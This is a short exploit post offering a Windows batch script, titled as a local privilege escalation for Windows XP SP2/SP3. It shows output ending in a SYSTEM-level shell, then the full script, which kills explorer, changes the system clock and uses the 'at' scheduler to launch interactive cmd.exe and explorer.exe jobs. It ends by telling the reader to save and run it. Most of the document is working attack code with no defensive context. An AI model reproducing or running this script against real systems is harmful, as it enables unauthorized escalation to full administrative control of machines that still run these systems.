Microsoft WinXP sp2/sp3 local system privilege escalation exploit
Process:
# Added a new job with job ID = 1
# Added a new job with job ID = 2
# Added a new job with job ID = 3
# Added a new job with job ID = 4
# Added a new job with job ID = 5
# Added a new job with job ID = 6
# Added a new job with job ID = 7
# Added a new job with job ID = 8
# Added a new job with job ID = 9
# Added a new job with job ID = 10
# Added a new job with job ID = 11
# Added a new job with job ID = 12
# [*] Backup time
# The current time is: 13:36:57,67
# Enter the new time: 13:44
#
# C:\WINDOWS\system32>whoami
# NT AUTHORITY\SYSTEM
#
Exploit code:
--------------------------------START---------------------------------------------------------
@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
echo [*] Backup time
time < time.txt
---------------------------------END-------------------------------------
Save the code above as a BAT script and run it.